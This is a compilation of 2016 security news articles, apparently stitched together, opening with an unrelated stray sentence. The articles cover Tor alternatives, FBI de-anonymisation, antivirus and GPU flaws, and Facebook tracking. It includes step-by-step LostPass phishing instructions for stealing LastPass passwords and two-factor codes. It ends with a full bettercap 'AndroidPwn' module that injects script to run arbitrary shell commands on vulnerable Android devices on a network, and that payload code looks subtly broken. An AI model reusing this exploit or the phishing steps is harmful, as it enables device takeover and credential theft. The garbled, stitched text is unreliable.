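The two unlinked finance and law documents surface together, while the chemistry and medical notes, which share only the common word “reaction” with each other and nothing with the query, do not appear at all.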

World's First Anonymous Communications Network Called "PrivaTegrity" Launched


Encryption guru David Chaum has released a new anonymity network concept called ‘PrivaTegrity’ that aims to fix many of Tor’s current problems, both legal and technical. Chaum presented his paper, “cMix: Anonymization by High-Performance Scalable Mixing”, at the Real World Cryptography Conference at Stanford on 6 January 2016.

The paper presents an evolution of the mix network concept, called cMix, and addresses several issues that governments and regular users had with mix networks. According to Chaum, the researchers now plan to use this new cryptographic protocol to build their own, more secure PrivaTegrity network as an alternative to Tor.
According to their research paper (page 1 – Section I, and page 4 – Chapter III-D), for each communications path established in a cMix network, the message sender creates connections with a series of trusted servers, with which it shares a series of keys.
When the sender sends out a message, its data is multiplied by all the keys. As the message passes through each server, it is divided by that server’s corresponding key but also multiplied by a random number. Messages are then stored in randomized order in each server’s buffer.
When the data needs to be retrieved and sent to the receiver, each server retrieves the message from its random position, divides out the random numbers, and then multiplies it by the recipient’s keys.
When the data arrives on the recipient’s computer, their keys are used to divide the data and decrypt the message.
 The cMix communication model
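The flow described above, as an added example that is not code from the paper or from PrivaTegrity: a toy cMix round over a prime field, where “dividing” by a key means multiplying by its modular inverse. It assumes a fixed chain of servers, that every sender key is divided off slot by slot before the first shuffle (so later servers need not know whose message a shuffled slot holds), that the per-slot product of the random numbers is obtained by pushing a batch of 1s through the same shuffles (a stand-in for the paper’s encrypted precomputation), and that recipient addresses travel in the clear next to the blinded values.

```python
import secrets

# Arithmetic is in the multiplicative group mod P, so "dividing" by a key means
# multiplying by its modular inverse (pow(x, P - 2, P), by Fermat's theorem).
P = 2**127 - 1  # Mersenne prime: every nonzero residue is invertible

def inv(x: int) -> int:
    return pow(x, P - 2, P)

def rand_elem() -> int:
    return secrets.randbelow(P - 1) + 1  # uniform in 1..P-1

def rand_perm(n: int) -> list:
    idx = list(range(n))  # Fisher-Yates shuffle driven by a CSPRNG
    for i in range(n - 1, 0, -1):
        j = secrets.randbelow(i + 1)
        idx[i], idx[j] = idx[j], idx[i]
    return idx

class MixServer:
    """One trusted mix node: keys shared with every party, plus this round's
    random numbers and its own secret storage order."""

    def __init__(self):
        self.keys = {}   # party id -> key shared with that party
        self.r = []      # per-slot random numbers for the current round
        self.perm = []   # this server's random storage order for the round

    def share_key(self, party: str) -> int:
        self.keys[party] = rand_elem()
        return self.keys[party]

    def begin_round(self, n: int) -> None:
        self.r = [rand_elem() for _ in range(n)]
        self.perm = rand_perm(n)

    def strip_sender_key(self, batch):
        # Forward pass, step 1: divide this server's key out of every slot.
        # Slots are still in input order, so each slot's sender is known.
        return [(snd, rcpt, v * inv(self.keys[snd]) % P) for snd, rcpt, v in batch]

    def blind_and_shuffle(self, batch):
        # Forward pass, step 2: multiply each slot by a random number, then store
        # the batch in this server's random order; the shuffle is what hides
        # which input slot became which output slot.
        blinded = [(rcpt, v * rj % P) for (rcpt, v), rj in zip(batch, self.r)]
        return [blinded[self.perm[k]] for k in range(len(batch))]

    def add_recipient_key(self, batch):
        # Output pass: multiply every slot by the key shared with its recipient.
        return [(rcpt, v * self.keys[rcpt] % P) for rcpt, v in batch]

def apply_keys(c: int, keys: list, divide: bool = False) -> int:
    """Sender side multiplies by all its keys; recipient side divides by all of its own."""
    for k in keys:
        c = c * (inv(k) if divide else k) % P
    return c

def run_round(servers, messages):
    """messages: (sender, recipient, plaintext int < P) per slot.  Returns the
    delivered (recipient, plaintext) pairs in the mix's output order."""
    n = len(messages)
    for s in servers:
        s.begin_round(n)
    # Precomputation: the product of random numbers that lands in each output
    # slot, found by pushing a batch of 1s through the same shuffles (cMix does
    # this under homomorphic encryption so no single server learns it in the clear).
    ones = [(None, 1)] * n
    for s in servers:
        ones = s.blind_and_shuffle(ones)
    blinding = [v for _, v in ones]
    # Real-time pass: sender keys off, then random numbers on and shuffle.
    batch = [(snd, rcpt, apply_keys(m, [s.keys[snd] for s in servers]))
             for snd, rcpt, m in messages]
    for s in servers:
        batch = s.strip_sender_key(batch)
    batch = [(rcpt, v) for _, rcpt, v in batch]  # sender identity is dropped
    for s in servers:
        batch = s.blind_and_shuffle(batch)
    # Retrieval: divide out the random numbers, then put the recipient keys on.
    batch = [(rcpt, v * inv(b) % P) for (rcpt, v), b in zip(batch, blinding)]
    for s in servers:
        batch = s.add_recipient_key(batch)
    return [(rcpt, apply_keys(v, [s.keys[rcpt] for s in servers], divide=True))
            for rcpt, v in batch]

def demo():
    # Constructed sample: three servers, four parties, a batch of three messages.
    servers = [MixServer() for _ in range(3)]
    for party in ("alice", "bob", "carol", "dave"):
        for s in servers:
            s.share_key(party)
    msgs = [("alice", "dave", 1001), ("bob", "carol", 2002), ("carol", "dave", 3003)]
    return run_round(servers, msgs)
```

demo() returns the same multiset of (recipient, message) pairs that went in, in an order fixed by the servers’ combined shuffle.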
Chaum says that by moving most of the computational work to the servers instead of the client, cMix achieves the same transfer speeds as Tor but, unlike its predecessor, is not vulnerable to a series of “tagging” attacks.
Tagging attacks rely on compromising Tor nodes, which on their own allow attackers to tag input slots with their output location. With cMix’s setup, the protocol is not vulnerable to this type of attack unless the malicious actor compromises every element of the protocol, which is very rare.
Additionally, the researchers say that in PrivaTegrity tagging attacks are also blocked by how users set up keys with network nodes.
“PrivaTegrity aims to provide privacy at a technical level that is not penetrable by nation states,” the researchers claim. “PrivaTegrity implements a new approach to user identification requiring each user to provide a small but different type of identifying information to each mix node.”

Kingston’s ‘Unhackable’ DataTraveler USB Drive Self-destructs With Incorrect PIN Entry

At CES 2016, Kingston announced a new USB drive that will make life easier for privacy-conscious users. The DataTraveler 2000 encrypted USB flash drive is built to give IT professionals the best possible security when carrying sensitive documents.


The USB drive looks impressive right from the outside. As you pull off the outer aluminum cover, a built-in keypad is there to surprise you. When the drive is inserted into a computer, you have to unlock it by entering the correct PIN. Fail to do so in 10 attempts and the drive self-destructs — sounds just like the pen drive from Hollywood flicks like Mission Impossible, right?

This USB 3.1 compatible thumb drive offers speeds of up to 135MBps read and 40MBps write. On the security front, the DataTraveler 2000 comes with hardware-based full-disk AES 256-bit encryption in XTS mode. The drive also protects your data from brute-force attacks.


Kingston DataTraveler 2000 USB — PIN protection, AES 256-bit data encryption, resists brute-force attacks


For additional protection, Kingston’s super-secure USB drive offers the option of auto-locking the drive by deleting the key and password files after 10 invalid login attempts.

“We are excited to add DataTraveler 2000 to our existing lineup of fast and encrypted USB Flash drives for organizations and SMBs,” said Ken Campbell, Flash business manager, Kingston. “It is the perfect option to deploy in the workforce where a uniform encrypted data storage solution that works on many different OS’ are in use.”

This OS-independent USB drive works with all popular operating systems, even Android and Chrome OS. The DataTraveler 2000 is available in 16GB, 32GB and 64GB capacities.

The DataTraveler 2000 is expected to hit the market at the end of Q1 2016.

FBI Started De-anonymizing The "Tor" Users Using Network Investigative Technique (NIT)

In July, at least two individuals from New York were charged with online child pornography offences after visiting a hidden service on the Tor network. The Federal Bureau of Investigation (FBI) had used a hacking tool to de-anonymize the suspects while they were browsing the Tor network.

Now we have more information on the operation conducted by the FBI: law enforcement hacked over a thousand computers, according to court documents reviewed by Motherboard.

It is the first time the FBI has conducted such an extensive operation against Tor users.
According to the court documents, the FBI monitored a bulletin board hidden service launched in August 2014, named Playpen, mainly used for “the advertisement and distribution of child pornography.”

The Playpen hidden service reached over 200,000 users in one year, with over 117,000 posts, mainly containing child pornography. Law enforcement discovered nearly 1,300 IP addresses belonging to its visitors.

According to Motherboard, the server running Playpen was seized by the FBI from a web host in North Carolina; law enforcement then ran the server itself to track its visitors. The agents used a network investigative technique (NIT) to obtain the IP addresses of Playpen users.

It isn’t the first time the FBI has used a NIT to de-anonymize Tor users: on December 22nd, 2014, Mr. Joseph Gross retained the assistance of Dr. Ashley Podhradsky, Dr. Matt Miller and Mr. Josh Stroschein to provide expert testimony in the case against paedophiles on Tor.

The suspects were accused in federal court in Omaha of viewing and possessing child pornography.

“The NIT was a Flash-based application that was developed by H.D. Moore and was released as part of Metasploit. The NIT, or more formally, Metasploit Decloaking Engine was designed to provide the real IP address of web users, regardless of proxy settings,” stated the forensic report.
According to the court records, investigators were informed that there were three servers containing contraband images, which the FBI found and took offline in November 2012.

In that case too the authorities used the servers as bait for online paedophiles: the Bureau placed the NIT on the servers and used it to de-anonymize Tor users accessing the illegal content. With this technique, the FBI identified the visitors’ IP addresses.
The NIT was also used in 2011 by agents running “Operation Torpedo”; it was the first time the FBI deployed tracking code broadly against every visitor to a website instead of targeting a particular user.

According to clues that emerged in the Playpen case, the version of the NIT currently used by the FBI is different from the one used during Operation Torpedo.
The legal counsel for one of the accused men speculates that the number of individuals charged with online child pornography crimes after visiting Playpen may increase in the coming months.
“Fifteen-hundred or so of these cases are going to end up getting filed out of the same, underlying investigation,” Colin Fieman, a federal public defender handling several of the related cases, told Motherboard in a phone interview. Fieman, who is representing Jay Michaud, a Vancouver teacher arrested in July 2015, said his estimate comes from what “we’ve seen in terms of the discovery.”
“There will probably be an escalating stream of these [cases] in the next six months or so,” Fieman added. “There is going to be a lot in the pipeline.”

Developer Shows Off Video Featuring iOS 9.3 Beta Jailbreak Demo

While Apple has seeded a massive new iOS 9.3 beta to developers, with a new Night Shift mode, improved Notes, News and Health apps, and more, developer Luca Todesco has posted a video showing an iOS 9.3 jailbreak on an iPhone 6.
He is the one who recently shared a screenshot of a jailbroken iPhone 6 running iOS 9.2.1.
Todesco was previously involved with the Pangu9 jailbreak for iOS 9.0-9.0.2 devices and has also released source code for jailbreaking iOS 8.4.1 on GitHub.

He has made it clear that he has no intention of sharing it, and it doesn’t look like that’s changing anytime soon.

Well, it’s at least good news that iOS 9.3 is vulnerable and very much jailbreakable. Hopefully Pangu, TaiG or another jailbreak team will soon release a public jailbreak for iOS 9.1, 9.2, 9.2.1 and iOS 9.3.

In the video, Luca Todesco shows off some of the new iOS 9.3 beta features that Apple released earlier, along with the iOS 9.3 jailbreak on an iPhone 6 with Cydia.




'Ridiculous' antivirus flaw made Windows PCs vulnerable to attack

A design flaw in Trend Micro Security antivirus allowed hackers to remotely hijack Windows PCs, infect them with any malware, wipe them clean and steal their stored passwords, even encrypted ones, thanks to a critical vulnerability in the Trend Micro Security software. Trend Micro has now issued a security patch for the flaw, which was in the password manager component of the antivirus package. Users should update the software as soon as possible.
Tavis Ormandy of Google Project Zero, a team of security researchers whose mission is to track down and resolve security holes in the world’s software, discovered the design flaw: a remote code execution vulnerability in the Trend Micro Antivirus Password Manager component that lets hackers steal users’ passwords. In short, once compromised, all your account passwords are gone. Ormandy posted his findings to the Google Security Research blog, urging that Trend Micro "should be paging people to get this fixed."
"I don't even know what to say -- how could you enable this thing *by default* on all your customer machines without getting an audit from a competent security consultant?" Ormandy wrote in one of a series of emails -- repeated on the blog -- to Trend Micro after finding the vulnerability. "You need to come up with a plan for fixing this right now. Frankly, it also looks like you're exposing all the stored passwords to the internet, but let's worry about that screw up after you get the remote code execution under control."
One of Ormandy’s findings was that any web page could run commands directly on PCs that had the flawed software installed. Such commands include wiping the computer, downloading and installing malware onto it, and uninstalling the Trend Micro antivirus software itself.
Digging further into the Trend Micro Password Manager, Ormandy discovered that a malicious script could steal all passwords stored in the browser, even encrypted ones. Ormandy warned Trend Micro that it needed to hire a cybersecurity professional.
"This means anyone on the internet can steal all of your passwords completely silently, as well as execute arbitrary code with zero user interaction," Ormandy wrote in another email to Trend Micro. "In my opinion, you should temporarily disable this feature for users, then hire an external consultancy to audit the code." 
"The worst thing you can do is leave users exposed while you clean this thing up," he continued.
Google’s Project Zero gives companies 90 days to fix problems before releasing its findings to the public. Trend Micro patched the vulnerability within a week, and a new version of the antivirus software is now available.
Trend Micro published a blog about the vulnerability after it had released the mandatory update. 
"The most important thing to know is that the critical vulnerabilities in the public report have been fixed for all Trend Micro Password Manager customers," Christopher Budd, global threat communications at Trend Micro, wrote in the post. "We responded quickly to the initial report and worked with Tavis throughout the process to understand the issue and address them. Thanks to his responsible work with us, we were able to address the most critical issues he brought us in less than one week. We are not aware of any active attacks against these vulnerabilities in that time."
Ormandy has previously exposed vulnerabilities in security products from AVG, Kaspersky Lab, FireEye and Sophos.

Bug in NVIDIA GPU reveals all your browsing history even in Chrome Incognito mode

So far we have all found solace in the fact that Chrome Incognito mode and Firefox Private Browsing exist to let us keep our intimate encounters (read: porn history) to ourselves. However, what came to the rescue while gaming could be putting us in trouble in this regard.
An Nvidia bug that has been plaguing PCs for years can expose our private browsing history to everyone.
What happened was that a Diablo 3 fan, while loading the game, saw images from his Chrome Incognito session being displayed on the screen. Technically, that content should not even be accessible to another application on the device, let alone displayed openly.
The user, Evan Anderson, took to Google and even submitted a bug report. On his blog he explained exactly how this happens:
GPU memory is not erased before giving it to an application. This allows the contents of one application to leak into another. When the Chrome incognito window was closed, its framebuffer was added to the pool of free GPU memory, but it was not erased. When Diablo requested a framebuffer of its own, Nvidia offered up the one previously used by Chrome. Since it wasn’t erased, it still contained the previous contents. Since Diablo doesn’t clear the buffer itself (as it should), the old incognito window was put on the screen again.
Sadly, Google itself says that Chrome Incognito mode does not guarantee that your private browsing data will stay private on a shared computer.
The bug lies with Nvidia, and until it gets fixed, if you are using one of their GPUs you could be next.

Find out how Facebook knows everything about you


Do you know Facebook knows everything about you and your preferences? Find out how

If you are a Facebook user, then you should know that by using Facebook, you have given consent to the company to track your activity for advertisers, who in turn hope to show you products that you will want to buy. This means that you cannot opt out of ads on Facebook unless you stop using Facebook completely.
However, you can do a lot to control the ads you see and stop Facebook from tracking what you do on the rest of the internet in service of its advertisers.
Besides all the usual arguments about privacy, there is another good reason to figure out what Facebook knows about you. It shows you ads based on what it thinks you like. The better it does this, the more likely you are going to see ads on things that truly interest you.

Facebook has three ways to figure you out

According to Business Insider, Facebook finds out information about you from what you tell them directly (name, age, marital status, parental status, where you live, work, went to school, etc.), what you do while you are on Facebook (stuff you have “liked”, groups you joined, photos you shared), and all the other things you do outside of Facebook on the internet. This includes the websites you visit, which track this information via cookies. Facebook reads these cookies and uses that information to display ads on its site and other websites.

Visit your Ad Preferences to see what Facebook thinks you like

It’s easy to see the things you’ve directly shared with Facebook (and your friends) on your Timeline profile page. However, to view a full total of what Facebook thinks you like, you need to find a tool called Ad Preferences.
Facebook has published a slideshow that helps you find it, since it may be unfamiliar. You can reach it through the controls Facebook has inserted into the ads themselves.
Go to your Facebook news feed. Move your mouse over any ad in the right-hand column, look for the little “x” that appears in the corner of the ad and click it. Alternatively, find an ad in your news stream, look for the little arrow and click it.
By choosing “Why am I seeing this?” you reach the Ad Preferences page, where you can tell Facebook which types of ads you prefer.
In fact, Facebook states that changing this “won’t change how many ads you see…because we’ll know more about what you like, [the ads that appear] should be more relevant.”

Click on Manage Your Ad Preferences

Based on the things you have liked, you can manage your ad preferences from a list of generic categories. Under each entry are the specific categories and things you have liked. These influence the ads you see.
Even after you change your preferences Facebook warns that, “you might still see ads that seem related to things you removed. For example, you might see an ad if it’s broadly targeted to everyone in your town or city.”

You can make Facebook stop tracking you on the internet

You can also make Facebook stop tracking you on the internet by selecting the lock icon in the top blue bar, then click on “Ads” in the left column and switch it off.
While this will not stop Facebook from showing you just as many ads, it won’t be using your web activity to choose them.
You can also opt out of letting other companies track your web activity for ads through the Digital Advertising Alliance in the USA, the Digital Advertising Alliance of Canada in Canada, or the European Digital Advertising Alliance in Europe.

Here's How an Attacker Can Steal a LastPass User's Email, Password, And Even Two-Factor Auth Code

This is a phishing attack against LastPass that allows an attacker to steal a LastPass user's email, password, and even two-factor auth code, giving full access to all passwords and documents stored in LastPass.
I call this attack LostPass. The code is available on GitHub.
LostPass works because LastPass displays messages in the browser that attackers can fake. Users can't tell the difference between a fake LostPass message and the real thing because there is no difference. It's pixel-for-pixel the same notification and login screen.
I will be discussing LostPass at ShmooCon 2016 at 10am EST today. You can watch the live stream here. I will update this post with my slides and the video when they become available.

Pixel-perfect Phishing

A few months ago, LastPass displayed a message on my browser that my session had expired and I needed to log in again. I hadn't used LastPass in a few hours, and hadn't done anything that would have caused me to be logged out. When I went to click the notification, I realized something: it was displaying this in the browser viewport. An attacker could have drawn this notification.
Any malicious website could have drawn that notification. Because LastPass trained users to expect notifications in the browser viewport, they would be none the wiser. The LastPass login screen and two-factor prompt are drawn in the viewport as well.
Since LastPass has an API that can be accessed remotely, an attack materialized in my mind.

The Attack

Here are the steps for LostPass, in order.

Visit the malicious site

Get the victim to go to a malicious website that looks benign, or a real website that is vulnerable to XSS. This is where we'll deploy lostpass.js. Unlike most phishing attacks, users won't be on their guard because this isn't supposed to be a secure website. It could be a funny video or image, even.

Check for LastPass and show the notification

If they have LastPass installed, show the login expired notification and log the user out of LastPass. LastPass is vulnerable to a logout CSRF, so any website can log any user out of LastPass. This will make it appear to the user that they are truly logged out.

Direct the victim to the login page

Once the victim clicks on the fake banner, direct them to an attacker-controlled login page that looks identical to the LastPass one. This is the login page for Chrome.
Notice the domain, "chrome-extension.pw". This looks similar to the Chrome protocol for real extensions "chrome-extension". There is an open issue in Chromium to address this.

Get the credentials

The victim enters their password, and the credentials are sent to the attacker's server, which checks whether they are correct by calling LastPass's API. The API will say whether two-factor authentication is required.
If the username or password is incorrect, we redirect the user back to the malicious website, but this time the LostPass notification bar says "Invalid Password".
If the user has two-factor authentication, redirect them to a two-factor prompt, like so:

Download the vault

Once the attacker has the correct username and password (and two-factor token), download all of the victim's information from the LastPass API. We can install a backdoor in their account via the emergency contact feature, disable two-factor authentication, add the attacker's server as a "trusted device". Anything we want, really.

Anonymous Exposes 1GB Data Belonging to Thailand’s Supreme Court

The data reportedly belongs to the Supreme Court of Thailand. It seems the data, which was uploaded yesterday, was stolen last Wednesday when Anonymous launched DDoS attacks against hundreds of Thai court websites.
The Blink Hacker Group, one of the many divisions of Anonymous, accidentally stumbled upon this massive trove of data while attempting to deface the Thailand Supreme Court website. The stolen data includes documents, payrolls and other valuable information.
The Blink Hacker Group is also participating in this operation with Anonymous. According to the hackers, apart from information related to the website of the Supreme Court, their team also got hold of data related to the day-to-day operations of the institution.
Evidently, the court’s system administrator believed it would be a safe bet to use the web server as a database for storing a variety of information such as budget files, payroll slips, pension information and criminal case data.
Not to forget that the sysadmin kept this massive database on a single machine, which made the hackers’ job fairly simple. So the hackers stole the data and have now exposed it online; after all, they are after the unjust Thai justice system and the corrupt ways of its legal and law enforcement departments.
Apparently, with operation #BoycottThailand, Anonymous aims to put pressure on the Thai legal system. The operation was started after the Thai Supreme Court sentenced two Myanmar migrant workers to death.
The two workers were accused of raping and murdering two British tourists. In a 37-minute long video, which was released by Anonymous and a press statement, the hacker group explained in detail why it was after Thailand’s police and justice departments.
The group detailed a long list of criminal cases created against the immigrants in Thailand, which were seemingly based upon dodgy evidence.
As per Anonymous, the law enforcement tortured the accused individuals in all the cases and also, surprisingly, in all the listed cases police lost key evidence that could have helped the suspects gain freedom.
Another ironic similarity between the cases as mentioned by Anonymous was that all involved foreign tourists who were visiting Thailand.
Anonymous believes that Thailand’s justice and law enforcement institutions are making a mockery of these trials just to keep the country’s image as a tourist haven intact, even at the cost of sacrificing the lives of innocent workers and immigrants.

Vulnerability In WebView Leaves Android Devices Vulnerable To "MITM" Attack

Recently I've been playing with Android's WebView based vulnerabilities, focusing on how to exploit them using a MITM attack.
One of the most interesting ones is the addJavascriptInterface vulnerability (CVE-2012-6636), which affects every device running a version older than Android 4.2.
There's an excellent post about this vulnerability; long story short, if an app uses a WebView UI control and declares a custom JavaScript interface for it like so:
import android.app.Activity;
import android.os.Bundle;
import android.webkit.WebView;

public class WebViewGUI extends Activity {
    WebView mWebView;

    @Override
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        mWebView = new WebView(this);
        mWebView.getSettings().setJavaScriptEnabled(true);
        // Vulnerable pattern (CVE-2012-6636): on Android versions before 4.2 every
        // public method of the bridge object is callable from page script under the
        // name "jsinterface", and reflection on it reaches the whole Java runtime.
        mWebView.addJavascriptInterface(new JavaScriptInterface(), "jsinterface");
        mWebView.loadUrl("file:///android_asset/www/index.html");
        setContentView(mWebView);
    }

    final class JavaScriptInterface {
        JavaScriptInterface() { }

        public String getSomeString() {
            return "string";
        }
    }
}
you can inject some special JavaScript into that page and make the device execute any shell command you want.
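A static check for the pattern just shown, added here as an example (not evilsocket's or bettercap's code): it flags a bridge object passed to addJavascriptInterface when the app targets an SDK below 17, bridge methods that lack @JavascriptInterface, and pages loaded over plain http, which is what puts a WebView within reach of a network attacker in the first place. The targetSdkVersion is passed in as a parameter because the manifest is not shown, and the sample sources are constructed after the snippet above.

```python
import re

# Android 4.2 (API 17) is where @JavascriptInterface became mandatory; below it,
# every public method of the bridge object is callable from page script, and
# getClass() on any of them reaches the whole Java runtime (CVE-2012-6636).
MIN_SAFE_SDK = 17

_ADD_IFACE = re.compile(r"\.addJavascriptInterface\s*\(\s*new\s+(\w+)\s*\(")
_METHOD = re.compile(r"(@JavascriptInterface\s+)?public\s+[\w<>\[\], ]+?\s+(\w+)\s*\(")
_CLEARTEXT = re.compile(r'loadUrl\s*\(\s*"http://')


def class_body(src: str, name: str):
    """Text between the braces of `class <name> {...}`.  Plain brace counting,
    with no awareness of strings or comments; enough for a demo lint."""
    m = re.search(r"\bclass\s+" + re.escape(name) + r"\b[^{]*\{", src)
    if m is None:
        return None
    depth, i = 1, m.end()
    while i < len(src) and depth:
        depth += {"{": 1, "}": -1}.get(src[i], 0)
        i += 1
    return src[m.end():i - 1]


def audit_webview(src: str, target_sdk: int) -> list:
    """Return (code, message) findings for one Java source file.  target_sdk is
    the app's targetSdkVersion, normally read from the manifest or Gradle file."""
    findings = []
    bridges = sorted(set(_ADD_IFACE.findall(src)))
    if bridges and target_sdk < MIN_SAFE_SDK:
        findings.append(("LEGACY_SDK",
                         f"targetSdkVersion {target_sdk} < {MIN_SAFE_SDK}: every public "
                         f"method of {bridges} is callable from page script, reflection included"))
    for name in bridges:
        body = class_body(src, name)
        if body is None:
            findings.append(("NOT_FOUND", f"bridge class {name} is not in this file"))
            continue
        for annotated, method in _METHOD.findall(body):
            if not annotated:
                findings.append(("UNANNOTATED", f"{name}.{method}() lacks @JavascriptInterface"))
    if _CLEARTEXT.search(src):
        findings.append(("CLEARTEXT", "WebView loads http:// content: a network "
                         "attacker can inject script into the page"))
    return findings


# Constructed sample modelled on the snippet above, but loading its page over
# plain http, which is the case the proxy module below is aimed at.
VULNERABLE_SRC = """
public class WebViewGUI extends Activity {
    WebView mWebView;
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        mWebView = new WebView(this);
        mWebView.getSettings().setJavaScriptEnabled(true);
        mWebView.addJavascriptInterface(new JavaScriptInterface(), "jsinterface");
        mWebView.loadUrl("http://example.test/index.html");
        setContentView(mWebView);
    }
    final class JavaScriptInterface {
        JavaScriptInterface() { }
        public String getSomeString() { return "string"; }
    }
}
"""

# The same app after the fix: bridge method annotated and content fetched over
# https; the targetSdkVersion is raised separately when the audit is run.
HARDENED_SRC = VULNERABLE_SRC.replace(
    "public String getSomeString()",
    "@JavascriptInterface\n        public String getSomeString()",
).replace('"http://', '"https://')

if __name__ == "__main__":
    for code, msg in audit_webview(VULNERABLE_SRC, target_sdk=16):
        print(code, "-", msg)
    print("hardened:", audit_webview(HARDENED_SRC, target_sdk=23))
```

Note that the annotation alone does not help an app that still targets an old SDK, so the audit keeps flagging HARDENED_SRC until targetSdkVersion is raised as well.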
In this post I'd like to show how easy it is to automatically exploit every vulnerable device on your network using bettercap; for this purpose I've written the AndroidPwn transparent proxy module.
class AndroidPwn < BetterCap::Proxy::Module
  @@command = nil
  @@payload = "<script>\n" +
              "var command = ['/system/bin/sh','-c','COMMAND_HERE'];\n" +
              "for(i in top) {\n" +
              "  try {\n" +
              "    top[i].getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec(cmd);\n" +
              "    break;\n" +
              "  }\n" +
              "  catch(e) {}\n" +
              "}\n" +
              "</script>"

  def self.on_options(opts)
    opts.separator ""
    opts.separator "AndroidPwn Proxy Module Options:"
    opts.separator ""

    opts.on( '--command STRING', 'Shell command(s) to execute.' ) do |v|
      @@command = v.strip
      @@payload['COMMAND_HERE'] = @@command.gsub( "'", "\\\\'" )
    end
  end

  def initialize
    raise BetterCap::Error, "No --command option specified for the proxy module." if @@command.nil?
  end

  def on_request( request, response )
    if is_exploitable?( request, response )
      BetterCap::Logger.info ""
      BetterCap::Logger.info "Pwning Android Device :".red
      BetterCap::Logger.info "  URL   : http://#{request.host}#{request.url}"
      BetterCap::Logger.info "  AGENT : #{request.headers['User-Agent']}"
      BetterCap::Logger.info ""

      response.body.sub!( '</head>', "</head>#{@@payload}" )
    end
  end

  private

  def is_exploitable?(req,res)
    req.headers.has_key?('User-Agent') and \
    req.headers['User-Agent'].include?("Android") and \
    req.headers['User-Agent'].include?("AppleWebKit") and \
    res.content_type =~ /^text\/html.*/ and \
    res.code == '200'
  end
end
As you can see, you just need to activate it, specify a --command COMMAND command line argument, and you're ready to go.
Leave it running and it will automatically perform a man-in-the-middle attack on your network and execute the command(s) you've chosen on every Android device it finds.
Source: Evilsocket